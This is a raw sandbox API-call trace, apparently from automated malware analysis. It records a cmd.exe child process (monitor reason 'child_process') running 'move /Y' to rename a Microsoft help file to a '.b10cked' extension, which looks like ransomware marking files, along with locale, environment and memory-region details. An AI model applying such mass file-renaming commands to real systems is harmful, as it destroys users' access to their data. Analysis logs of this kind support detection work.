[0196.634] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1efca0, cchData=128 | out: lpLCData="1") returned 2 [0196.634] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0196.634] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0196.634] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0196.634] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0196.634] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0196.634] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, 
cchData=32 | out: lpLCData="Fri") returned 4 [0196.634] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0196.634] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0196.634] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0196.634] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0196.634] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0196.635] GetConsoleTitleW (in: lpConsoleTitle=0x2a08e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0196.635] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0196.635] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0196.635] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0196.635] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0196.636] _wcsicmp (_String1="move", _String2=")") returned 68 [0196.636] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0196.636] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0196.636] _wcsicmp (_String1="IF", _String2="move") returned -4 [0196.636] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0196.636] _wcsicmp (_String1="REM", _String2="move") returned 5 [0196.636] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0196.639] GetConsoleTitleW (in: lpConsoleTitle=0x1ef998, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0196.639] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0196.639] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0196.639] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0196.639] _wcsicmp (_String1="move", _String2="TYPE") returned -7 
[0196.639] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0196.639] _wcsicmp (_String1="move", _String2="CD") returned 10 [0196.639] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0196.639] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0196.639] _wcsicmp (_String1="move", _String2="REN") returned -5 [0196.639] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0196.639] _wcsicmp (_String1="move", _String2="SET") returned -6 [0196.639] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0196.639] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0196.639] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0196.639] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0196.639] _wcsicmp (_String1="move", _String2="MD") returned 11 [0196.639] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0196.639] _wcsicmp (_String1="move", _String2="RD") returned -5 [0196.639] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0196.639] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0196.639] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0196.639] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0196.640] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0196.640] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0196.640] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0196.640] _wcsicmp (_String1="move", _String2="VER") returned -9 [0196.640] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0196.640] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0196.640] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0196.640] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0196.640] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0196.640] _wcsicmp (_String1="move", _String2="START") returned -6 [0196.640] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0196.640] _wcsicmp (_String1="move", 
_String2="KEYS") returned 2 [0196.640] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0196.641] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0196.641] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0196.641] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1ef754, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1ef74c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1ef74c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0196.642] _wcsnicmp 
(_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0196.643] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0196.643] _wcsicmp (_String1="HX_103~1.HXH", _String2=".") returned 58 [0196.643] _wcsicmp (_String1="HX_103~1.HXH", _String2="..") returned 58 [0196.643] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXH" (normalized: "c:\\users\\alluse~1\\micros~2\\hx_103~1.hxh")) returned 0x2022 [0196.643] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2b1e38 | out: 
lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0196.643] SetErrorMode (uMode=0x0) returned 0x0 [0196.643] SetErrorMode (uMode=0x1) returned 0x0 [0196.643] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXH", nBufferLength=0x104, lpBuffer=0x1ef0dc, lpFilePart=0x1ef0c4 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXH", lpFilePart=0x1ef0c4*="HX_103~1.HXH") returned 0x27 [0196.643] SetErrorMode (uMode=0x0) returned 0x1 [0196.643] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0196.643] _wcsicmp (_String1="HX_103~1.HXH", _String2=".") returned 58 [0196.643] _wcsicmp (_String1="HX_103~1.HXH", _String2="..") returned 58 [0196.643] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXH" (normalized: "c:\\users\\alluse~1\\micros~2\\hx_103~1.hxh")) returned 0x2022 [0196.644] SetErrorMode (uMode=0x0) returned 0x0 [0196.644] SetErrorMode (uMode=0x1) returned 0x0 [0196.644] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXH", nBufferLength=0x104, lpBuffer=0x1ef558, lpFilePart=0x1ef2f0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXH", lpFilePart=0x1ef2f0*="HX_103~1.HXH") returned 0x27 [0196.644] SetErrorMode (uMode=0x0) returned 0x1 [0196.644] SetErrorMode (uMode=0x0) returned 0x0 [0196.644] SetErrorMode (uMode=0x1) returned 0x0 [0196.644] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MTOC_Hx.HxH.b10cked", nBufferLength=0x104, lpBuffer=0x1ef760, lpFilePart=0x1ef2f0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MTOC_Hx.HxH.b10cked", lpFilePart=0x1ef2f0*="Hx_1033_MTOC_Hx.HxH.b10cked") returned 0x36 [0196.644] SetErrorMode (uMode=0x0) returned 0x1 [0196.644] SetLastError (dwErrCode=0x0) [0196.644] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MTOC_Hx.HxH.b10cked" (normalized: 
"c:\\users\\alluse~1\\micros~2\\hx_1033_mtoc_hx.hxh.b10cked")) returned 0xffffffff [0196.644] GetLastError () returned 0x2 [0196.644] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXH", fInfoLevelId=0x1, lpFindFileData=0x1eec6c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eec6c) returned 0x2a0e58 [0196.644] FindNextFileW (in: hFindFile=0x2a0e58, lpFindFileData=0x1eec6c | out: lpFindFileData=0x1eec6c) returned 0 [0196.645] FindClose (in: hFindFile=0x2a0e58 | out: hFindFile=0x2a0e58) returned 1 [0196.645] GetLastError () returned 0x12 [0196.645] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXH", fInfoLevelId=0x1, lpFindFileData=0x1eec6c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eec6c) returned 0x2a0e58 [0196.645] FindNextFileW (in: hFindFile=0x2a0e58, lpFindFileData=0x1eec6c | out: lpFindFileData=0x1eec6c) returned 0 [0196.645] FindClose (in: hFindFile=0x2a0e58 | out: hFindFile=0x2a0e58) returned 1 [0196.645] GetLastError () returned 0x12 [0196.646] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXH", fInfoLevelId=0x1, lpFindFileData=0x2b1bd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2b1bd8) returned 0x2a0e58 [0196.646] FindNextFileW (in: hFindFile=0x2a0e58, lpFindFileData=0x2b1bd8 | out: lpFindFileData=0x2b1bd8) returned 0 [0196.646] FindClose (in: hFindFile=0x2a0e58 | out: hFindFile=0x2a0e58) returned 1 [0196.646] GetLastError () returned 0x12 [0196.646] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXH", fInfoLevelId=0x1, lpFindFileData=0x2b1bd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2b1bd8) returned 0x2a0e58 [0196.646] FindNextFileW (in: hFindFile=0x2a0e58, lpFindFileData=0x2b1bd8 | out: lpFindFileData=0x2b1bd8) returned 0 [0196.646] FindClose (in: hFindFile=0x2a0e58 | out: hFindFile=0x2a0e58) 
returned 1 [0196.646] GetLastError () returned 0x12 [0196.646] _get_osfhandle (_FileHandle=2) returned 0xb [0196.646] GetFileType (hFile=0xb) returned 0x2 [0196.771] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0196.771] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1eee3c | out: lpMode=0x1eee3c) returned 1 [0196.771] _get_osfhandle (_FileHandle=2) returned 0xb [0196.771] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x1eee70 | out: lpConsoleScreenBufferInfo=0x1eee70) returned 1 [0196.771] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0196.772] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1eeeb0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0196.772] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x1eee94, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1eee94*=0x2c) returned 1 [0196.772] longjmp () [0196.773] _get_osfhandle (_FileHandle=1) returned 0x7 [0196.773] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0196.773] _get_osfhandle (_FileHandle=1) returned 0x7 [0196.773] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0196.773] _get_osfhandle (_FileHandle=0) returned 0x3 [0196.773] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0196.773] SetConsoleInputExeNameW () returned 0x1 [0196.773] GetConsoleOutputCP () returned 0x1b5 [0196.773] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0196.773] SetThreadUILanguage (LangId=0x0) returned 0x409 [0196.773] exit (_Code=1) Process: id = "454" image_name = 
"cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea167a0" os_pid = "0xbdc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXD\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MValidator.HxD.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28939 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28940 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 28941 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 28942 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 28943 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 28944 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28945 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type 
= mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28946 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28947 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 28948 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28959 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28960 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28961 start_va = 0x190000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 28962 start_va = 0x1a0000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 28963 start_va = 0x2a0000 end_va = 0x306fff entry_point = 0x2a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28964 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 28965 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28966 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 
region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 28967 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28968 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28969 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 28970 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 28971 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 28972 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 28973 start_va = 0x310000 end_va = 0x3d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 28974 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 28975 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: 
"c:\\windows\\system32\\msctf.dll") Region: id = 28976 start_va = 0x150000 end_va = 0x156fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 28977 start_va = 0x160000 end_va = 0x161fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 28978 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 28979 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 28980 start_va = 0x3e0000 end_va = 0x4e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 28981 start_va = 0x4f0000 end_va = 0x10effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 28982 start_va = 0x10f0000 end_va = 0x1252fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010f0000" filename = "" Region: id = 29031 start_va = 0x1260000 end_va = 0x131ffff entry_point = 0x1260000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 649 os_tid = 0xbf8 [0196.370] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fbac | out: lpSystemTimeAsFileTime=0x12fbac*(dwLowDateTime=0xa9de1e80, dwHighDateTime=0x1d440a9)) [0196.370] GetCurrentProcessId () returned 0xbdc [0196.370] GetCurrentThreadId () returned 0xbf8 [0196.370] GetTickCount () returned 0x37a7c [0196.370] QueryPerformanceCounter (in: lpPerformanceCount=0x12fba4 | out: lpPerformanceCount=0x12fba4*=25316101724) returned 1 [0196.373] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0196.373] __set_app_type (_Type=0x1) [0196.373] __p__fmode () returned 0x76b331f4 
[0196.373] __p__commode () returned 0x76b331fc [0196.373] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0196.373] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0196.373] GetCurrentThreadId () returned 0xbf8 [0196.373] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbf8) returned 0x38 [0196.373] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0196.373] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0196.373] SetThreadUILanguage (LangId=0x0) returned 0x409 [0196.374] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0196.374] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12fb3c | out: phkResult=0x12fb3c*=0x0) returned 0x2 [0196.374] VirtualQuery (in: lpAddress=0x12fb73, lpBuffer=0x12fb0c, dwLength=0x1c | out: lpBuffer=0x12fb0c*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0196.374] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12fb0c, dwLength=0x1c | out: lpBuffer=0x12fb0c*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0196.374] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12fb0c, dwLength=0x1c | out: lpBuffer=0x12fb0c*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0196.374] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12fb0c, dwLength=0x1c | out: lpBuffer=0x12fb0c*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, 
State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0196.374] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12fb0c, dwLength=0x1c | out: lpBuffer=0x12fb0c*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0196.374] GetConsoleOutputCP () returned 0x1b5 [0196.374] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0196.374] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0196.374] _get_osfhandle (_FileHandle=1) returned 0x7 [0196.374] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0196.375] _get_osfhandle (_FileHandle=1) returned 0x7 [0196.375] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0196.375] _get_osfhandle (_FileHandle=1) returned 0x7 [0196.375] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0196.375] _get_osfhandle (_FileHandle=0) returned 0x3 [0196.375] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0196.375] _get_osfhandle (_FileHandle=0) returned 0x3 [0196.375] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0196.375] GetEnvironmentStringsW () returned 0x1b0180* [0196.376] FreeEnvironmentStringsW (penv=0x1b0180) returned 1 [0196.376] GetEnvironmentStringsW () returned 0x1b0180* [0196.376] FreeEnvironmentStringsW (penv=0x1b0180) returned 1 [0196.376] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12eaac | out: phkResult=0x12eaac*=0x40) returned 0x0 [0196.376] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12eab4, lpData=0x12eab8, lpcbData=0x12eab0*=0x1000 | out: lpType=0x12eab4*=0x0, lpData=0x12eab8*=0xa8, lpcbData=0x12eab0*=0x1000) returned 0x2 [0196.376] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", 
